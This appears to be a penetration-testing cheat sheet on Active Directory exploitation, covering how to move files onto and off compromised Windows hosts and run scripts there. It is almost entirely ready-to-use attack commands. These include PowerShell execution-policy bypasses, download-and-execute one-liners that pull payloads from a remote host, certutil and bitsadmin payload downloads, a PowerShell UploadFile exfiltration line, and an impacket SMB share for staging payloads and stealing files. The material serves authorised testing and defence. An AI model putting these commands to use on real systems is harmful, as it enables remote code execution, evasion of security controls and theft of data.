Active Directory Exploitation: File Transfer and Exfiltration, Execution

---

Back to Table of Contents

Overview

• File transfer
• File/script execution
• File transfer using SMB
• File transfer using external tools & static binaries
• Resources

---

File download, native commands:

Powershell

Binary or script execution via powershell is crucial to exploitation of AD environments, as is the ability to transfer files to the target machine. Below are various methods of powershell execution, including methods of policy bypass, execution without writing to disk, piping, and so on.

Get-ExecutionPolicy

Enabling powershell

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

Using Powershell's Invoke- commands:

Get-Content .file_to_execute.ps1 | Invoke-Expression

GC .file_to_execute.ps1 | iex

PowerShell.exe -ExecutionPolicy Bypass -File .file_to_execute.ps1

PowerShell.exe -ExecutionPolicy UnRestricted -File .file_to_execute.ps1

Set-ExecutionPolicy Bypass -Scope Process

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

HKEY_CURRENT_USERSoftwareMicrosoftPowerShell1ShellIdsMicrosoft.PowerShell

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}  Disable-ExecutionPolicy  .file_to_execute.ps1

Bypassing policy via piping commands:

Echo Write-Host "script" | PowerShell.exe -noprofile -

Get-Content .file_to_execute.ps1 | PowerShell.exe -noprofile -

Using type -- basically the Windows equivalent of cat:

type .runme.ps1 | PowerShell.exe -noprofile - 

Downloading and executing payloads from remotely hosted servers:

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://ip/payload.ps1')"

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://ip/payload.exe', 'payload.exe')

Upload/Exfiltration of files using powershell:

powershell (New-Object System.Net.WebClient).UploadFile('http://ip/file_to_extract.txt', 'file_to_extract.txt')

Powershell: Command

• Can be written as -command or simply -c

Powershell -command "script_content"

Combining the methods:

powershell -executionpolicy bypass IEX(New-Object Net.WebClient).downloadString('http://ip/payload.ps1')

---

Other methods of file transfer also exist within the context of a default AD/Windows environment.

certutil.exe

certutil.exe -urlcache -split -f http://ip/payload.exe payload.exe

wget & curl

wget and curl are sometimes available on Windows machines and can be used just as on Linux, however they are not always available.

bitsadmin.exe

bitsadmin.exe /transfer mydownloadjob /download /priority high http://ip/payload.exe payload.exe

---

SMB

SMB is an extremely useful method of file transfer for both Windows and Linux targets.

One of the strongest advantages of smb is the ability to run payloads without the files ever touching the disk while also not using http methods of download, which may be blocked or heavily filtered.

Within the impacket toolbox is an extremely useful smb server script which allows for quick, simple, and seamless initialization of an smb server.

impacket-smbserver share_name $(pwd) -smb2support -user username -password password

Logging into the smb server from the target machine can be done simply via powershell or evil-winrm:

$pass = convertto-securestring 'password' -AsPlainText -Force;
$cred = New-Object System.Management.Automation.PSCredential('username', $pass);
New-PSDrive -Name username -PSProvider FileSystem -Credential $cred -Root \\ip\share_name;

The share can be viewed just as any other directory on Windows using dir:

dir \\ip\share_name

Upload/Download of files from the share:

copy \\ip\share_name\file_to_extract.txt file_to_extract.txt

copy file_to_extract.txt \\ip\share_name\file_to_extract.txt

---

Other Methods

• ftp
• tftp
• mshta
• rundll32
• php
• socat
• netcat

Useful resources:

https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/

https://github.com/milkdevil/UltimateAppLockerByPassList

https://github.com/740i/pentest-notes/blob/master/filetransfers.md

https://guide.offsecnewbie.com/transferring-files

https://ppn.snovvcrash.rocks/pentest/infrastructure/file-transfer

https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/

https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration